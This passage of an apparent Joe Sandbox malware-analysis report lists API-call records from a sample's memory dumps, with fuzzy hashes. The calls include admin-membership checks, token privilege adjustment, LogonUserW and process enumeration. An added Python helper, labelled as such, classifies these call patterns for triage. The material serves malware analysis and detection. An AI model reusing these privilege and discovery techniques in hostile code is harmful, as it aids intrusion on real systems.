                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1922334811-0
                                                                          • Opcode ID: 1c1f971c8a754f4f611e5f2373fd8e7884eb6692094183307228954d7d436132
                                                                          • Instruction ID: f51d4daa85fb9d3d6288bae6ff9c10e23687f0aaea52609451dc158da33bf197
                                                                          • Opcode Fuzzy Hash: 1c1f971c8a754f4f611e5f2373fd8e7884eb6692094183307228954d7d436132
                                                                          • Instruction Fuzzy Hash: EC116AB2914205AFE719EFA4DC85D6BB7ECFB48710B20862EE45697241EA71AC408B60
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00368774
                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0036878B
                                                                          • FreeSid.ADVAPI32(?), ref: 0036879B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 3429775523-0
                                                                          • Opcode ID: 239cce3efc1cc4f47db92391c568f4503acfb9145a04785d26b69b7fcced9687
                                                                          • Instruction ID: e574aeef304b17ea9dcf31db43041fe08215b8cb4e238258a0a5aff86510a03f
                                                                          • Opcode Fuzzy Hash: 239cce3efc1cc4f47db92391c568f4503acfb9145a04785d26b69b7fcced9687
                                                                          • Instruction Fuzzy Hash: C0F04975A1130CBFDF00DFF4DC89ABEBBBCEF08301F1045A9A901E2281E6726A048B50
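The API sequences listed above for the UDP socket (socket/bind/closesocket), the GetTokenInformation + HeapAlloc pair, the Toolhelp32 process walk, the SetErrorMode/GetDiskFreeSpaceExW probe and the AllocateAndInitializeSid/CheckTokenMembership function are the raw material for capability triage. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses those listing lines into structured calls and maps the recurring patterns to capability labels. The sample listing is copied from the records above; the label names and the rule set are the example's own choices; the constant values it decodes (AF_INET/SOCK_DGRAM/IPPROTO_UDP = 2/2/17, TokenGroups = 2, SEM_FAILCRITICALERRORS = 1, SECURITY_BUILTIN_DOMAIN_RID = 0x20, DOMAIN_ALIAS_RID_ADMINS = 0x220) are the documented Windows SDK values.

```python
"""Triage helper for Joe Sandbox IDA-plugin API listings (added example, not report tooling).

The argument columns in the listing are stack slots captured at the call site, so only
the leading values correspond to real parameters (SetErrorMode shows three values but
takes one); the rules below therefore only look at leading arguments.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed excerpt: API lines copied from the report records for the UDP-socket,
# token-group, Toolhelp32, disk-space and admin-check functions.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 00387D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00387DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0038679E
• WSAGetLastError.WSOCK32(00000000), ref: 003867C7
• bind.WSOCK32(00000000,?,00000010), ref: 00386800
• closesocket.WSOCK32(00000000,00000000), ref: 00386821
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003680C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003680CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003680D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003680E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003680F6
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0038EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0038EE4B
  • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
• Process32NextW.KERNEL32(00000000,?), ref: 0038EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0038EF1A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0037B343
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0037B39D
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0037B3EA
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00368774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0036878B
• FreeSid.ADVAPI32(?), ref: 0036879B
"""

# Documented Windows constants for the arguments the rules inspect.
AF_INET, SOCK_DGRAM, IPPROTO_UDP = 2, 2, 17
TOKEN_GROUPS = 2                      # TOKEN_INFORMATION_CLASS.TokenGroups
SEM_FAILCRITICALERRORS = 0x0001
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220

# One listing line: "• api.MODULE(arg,arg,...), ref: ADDR" or "• api.MODULE ref: ADDR".
_CALL_RE = re.compile(
    r"^•\s*(?P<api>[\w:@]+)\.(?P<mod>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # None where the listing shows '?'
    ref: int


def parse_listing(text: str) -> List[List[Call]]:
    """Split the listing on 'APIs' headers into per-function records of Call objects.
    '• Part of subcall function ...' lines describe callees, not this function, and are skipped."""
    records: List[List[Call]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append([])
            continue
        if not records or "Part of subcall" in line:
            continue
        m = _CALL_RE.match(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        for a in (m.group("args") or "").split(","):
            a = a.strip()
            if a:
                args.append(None if a == "?" else int(a, 16))
        records[-1].append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return records


def _find(record: List[Call], api: str) -> Optional[Call]:
    return next((c for c in record if c.api == api), None)


def classify(record: List[Call]) -> List[str]:
    """Map one function's call pattern to capability labels (label names are this example's)."""
    apis = {c.api for c in record}
    labels: List[str] = []
    s = _find(record, "socket")
    if s and s.args[:3] == [AF_INET, SOCK_DGRAM, IPPROTO_UDP] and "bind" in apis:
        labels.append("udp-socket-bind")
    t = _find(record, "GetTokenInformation")
    if t and len(t.args) > 1 and t.args[1] == TOKEN_GROUPS and "HeapAlloc" in apis:
        labels.append("token-groups-query")          # size query, alloc, then real query
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= apis:
        labels.append("process-enumeration")
    e = _find(record, "SetErrorMode")
    if "GetDiskFreeSpaceExW" in apis and e and e.args[:1] == [SEM_FAILCRITICALERRORS]:
        labels.append("disk-size-probe")             # silent probe: no "insert disk" dialogs
    sid = _find(record, "AllocateAndInitializeSid")
    if (sid and sid.args[1:4] == [2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS]
            and "CheckTokenMembership" in apis):
        labels.append("builtin-administrators-check")  # S-1-5-32-544 membership test
    return labels


def triage(text: str) -> List[List[str]]:
    """Labels per record, in listing order."""
    return [classify(r) for r in parse_listing(text)]


if __name__ == "__main__":
    for rec, labels in zip(parse_listing(SAMPLE_LISTING), triage(SAMPLE_LISTING)):
        print(f"{rec[0].ref:08X} {[c.api for c in rec]} -> {labels}")
```

Two of the rules carry the checks a practitioner would want to confirm by hand: AllocateAndInitializeSid with sub-authority count 2 and RIDs 0x20/0x220 builds the BUILTIN\Administrators SID (S-1-5-32-544), so together with CheckTokenMembership this is the standard "am I an admin" test rather than an arbitrary group lookup; and the GetTokenInformation/HeapAlloc/GetTokenInformation triple with class 2 is the usual two-call size-then-fill pattern for TokenGroups. Because the listing's argument columns are stack-slot snapshots, rules that matched on trailing values would misfire; keep matches to the leading parameters as done here.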
                                                                          APIs
                                                                          • __time64.LIBCMT ref: 0037889B
                                                                            • Part of subcall function 0033520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00378F6E,00000000,?,?,?,?,0037911F,00000000,?), ref: 00335213
                                                                            • Part of subcall function 0033520A: __aulldiv.LIBCMT ref: 00335233
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                          • String ID: 0e=
                                                                          • API String ID: 2893107130-2613636977
                                                                          • Opcode ID: bc03d3d466a22e13dd10d8b4c7ad81927b86cbfa75c66fc03451b961fcd0eb82
                                                                          • Instruction ID: 2c7fa4c74640b5ae2ec497f033c507a17f286548eb73fc37906b1096d2b9bd91
                                                                          • Opcode Fuzzy Hash: bc03d3d466a22e13dd10d8b4c7ad81927b86cbfa75c66fc03451b961fcd0eb82
                                                                          • Instruction Fuzzy Hash: 6621A2726255108BC72ACF29E841A52B3E5EBA5311F698E6DD0F9CB2C0CA34A945CB54
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0037C6FB
                                                                          • FindClose.KERNEL32(00000000), ref: 0037C72B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 116944690522588b32605644259f8b5ff03fa64e39ce8fa0a0bac7f5e3e16cd8
                                                                          • Instruction ID: 5d8ca8d9dac91c533ca797d1849f38147c6ba351802fcaee9138f18cadb8cb9e
                                                                          • Opcode Fuzzy Hash: 116944690522588b32605644259f8b5ff03fa64e39ce8fa0a0bac7f5e3e16cd8
                                                                          • Instruction Fuzzy Hash: EB1182756002009FDB15DF29D855A6AF7E8EF49324F00851EF9A9CB291DB34A801CB81
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00389468,?,0039FB84,?), ref: 0037A097
                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00389468,?,0039FB84,?), ref: 0037A0A9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: 1bcc6aa69d9eed047701f42a488d508c1b05b633447bf26dccafdb0a4e2709ce
                                                                          • Instruction ID: cd36d81120a5ae59f94240c27e00fef3b03635a37f8ce73d8130afa87be9fb9c
                                                                          • Opcode Fuzzy Hash: 1bcc6aa69d9eed047701f42a488d508c1b05b633447bf26dccafdb0a4e2709ce
                                                                          • Instruction Fuzzy Hash: F4F0823510522DBBDB229FA4DC88FEE776CBF08361F008566F909D6181DA309944CBA1
                                                                          APIs
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00368309), ref: 003681E0
                                                                          • CloseHandle.KERNEL32(?,?,00368309), ref: 003681F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                          • String ID:
                                                                          • API String ID: 81990902-0
                                                                          • Opcode ID: 55b2eb43dfdb30be734fb185eb7a662d015e44e583e509c4ec961af25c496b96
                                                                          • Instruction ID: e81598b1bb2fd34a406e634a68eb88606191db5bbbfc370e036c0831cf8e1f72
                                                                          • Opcode Fuzzy Hash: 55b2eb43dfdb30be734fb185eb7a662d015e44e583e509c4ec961af25c496b96
                                                                          • Instruction Fuzzy Hash: 04E0BF71010510AEE7272B60EC49D7777ADEF04310B148929B465C4470DB625C91DB10
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00338D57,?,?,?,00000001), ref: 0033A15A
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0033A163
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: d5b98fb7f7dc7d9876038460bd6329efae66aa3aa14349cf607a1666366c2f7f
                                                                          • Instruction ID: 210918fed998cbecece1f1817414a1f03a0778455084f5078d9bab0dfdd79496
                                                                          • Opcode Fuzzy Hash: d5b98fb7f7dc7d9876038460bd6329efae66aa3aa14349cf607a1666366c2f7f
                                                                          • Instruction Fuzzy Hash: 06B09235054208EFCB022BA1EC49B883F6CEB44BA2F404022F60DC4060CB6758A08A91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 60f4f83be34cb40353533b09fbd5e05d5e5ce74865c0a1fe5dddbc1f45379020
                                                                          • Instruction ID: 363200af6f6229f1833d7461eff99817f701f0be3aa5a1cf6098edceefacca84
                                                                          • Opcode Fuzzy Hash: 60f4f83be34cb40353533b09fbd5e05d5e5ce74865c0a1fe5dddbc1f45379020
                                                                          • Instruction Fuzzy Hash: BF320062D29F014DD7279634DCB2336A28CAFB73D4F55D737E81AB5AA6EB28C4834100
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9995b24822348121e20d945c49b28923eac6436ab4ebdabb0fc7e82cb61a0738
                                                                          • Instruction ID: d52ae57232752714f1935d2a837c88c3e145c7a1ee484f0984b2fc455a485c63
                                                                          • Opcode Fuzzy Hash: 9995b24822348121e20d945c49b28923eac6436ab4ebdabb0fc7e82cb61a0738
                                                                          • Instruction Fuzzy Hash: C6B10321D2AF404DD76396398831336BB9CAFBB2D5F91D71BFC1674D62EB2185838141
                                                                          APIs
                                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00374C4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: mouse_event
                                                                          • String ID:
                                                                          • API String ID: 2434400541-0
                                                                          • Opcode ID: 1216a78efffc76c0f2fa5d89b0027d3249e9f9f581ab870baf609004b9abe182
                                                                          • Instruction ID: a6886e318863d4762a5b5453b964557c2f6f5056f8ce6af032b85c0e4bbdde68
                                                                          • Opcode Fuzzy Hash: 1216a78efffc76c0f2fa5d89b0027d3249e9f9f581ab870baf609004b9abe182
                                                                          • Instruction Fuzzy Hash: F4D05E9116520B78FD3F0724AE0FF7A050CE304782FD2C149710ACA0C1EF997C409032
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00368389), ref: 003687D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          • Opcode ID: c5b87c062065af86c3d1eacd7f096545ecea4249db102b7fcd5a169b75bab32e
                                                                          • Instruction ID: 4dbaf01370cfdb4cadfa03385ec6ba3bbc48d138c1a0b7bad9c27e35cce7e509
                                                                          • Opcode Fuzzy Hash: c5b87c062065af86c3d1eacd7f096545ecea4249db102b7fcd5a169b75bab32e
                                                                          • Instruction Fuzzy Hash: 09D05E3226450EAFEF018EA4DC01EBE3B6DEB04B01F408111FE15C51A1C776D835AB60
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0033A12A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: a342b1dbba88cdabb59159ff07f56a42278b71ab65c62436c65c385edd7a4b8b
                                                                          • Instruction ID: 5bbbd00f68527462815950e50b2dc9f98d2211c1eac3d6b9b98a8ebed457faf1
                                                                          • Opcode Fuzzy Hash: a342b1dbba88cdabb59159ff07f56a42278b71ab65c62436c65c385edd7a4b8b
                                                                          • Instruction Fuzzy Hash: 3FA0113000020CEB8B022BA2EC08888BFACEA002A0B008022F80C800228B33A8A08A80
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: M
                                                                          • API String ID: 0-3664761504
                                                                          • Opcode ID: 95e67fea9ab11b45b91e8b9fa76b0705c0832e53fa217cf3a3ee75fe3cef4771
                                                                          • Instruction ID: 8d4f6312703bb2582c49e9076e32e6cb646415ea942a0ce1fc967d779349b9fd
                                                                          • Opcode Fuzzy Hash: 95e67fea9ab11b45b91e8b9fa76b0705c0832e53fa217cf3a3ee75fe3cef4771
                                                                          • Instruction Fuzzy Hash: E3116DD785D6C64FC7038B70ACA91C6BF70DB2618A34A08DBC882A74E3F4995507CB06
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 98a0b22aa3d0f9813275792d889ffecdb646fee112863f644977b810823ee090
                                                                          • Instruction ID: 1d9c3e00b8d093b8d1de31a31992a3f5cefc976599ec2290f2cfde885af9179c
                                                                          • Opcode Fuzzy Hash: 98a0b22aa3d0f9813275792d889ffecdb646fee112863f644977b810823ee090
                                                                          • Instruction Fuzzy Hash: 9B223430A05626CBDF3B8B28E49477CB7A5FB01304F2A846AD9468B996DF70DDD2C741
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                           • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction ID: 45f664dd040c6f91856282b1ff029a82e3a48428224cef6e18072825c5365cbb
                                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction Fuzzy Hash: A7C174362051930ADF6F463A84B403FFAA15EA37B271B076DD8B3CB5D4EE20D965D620
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
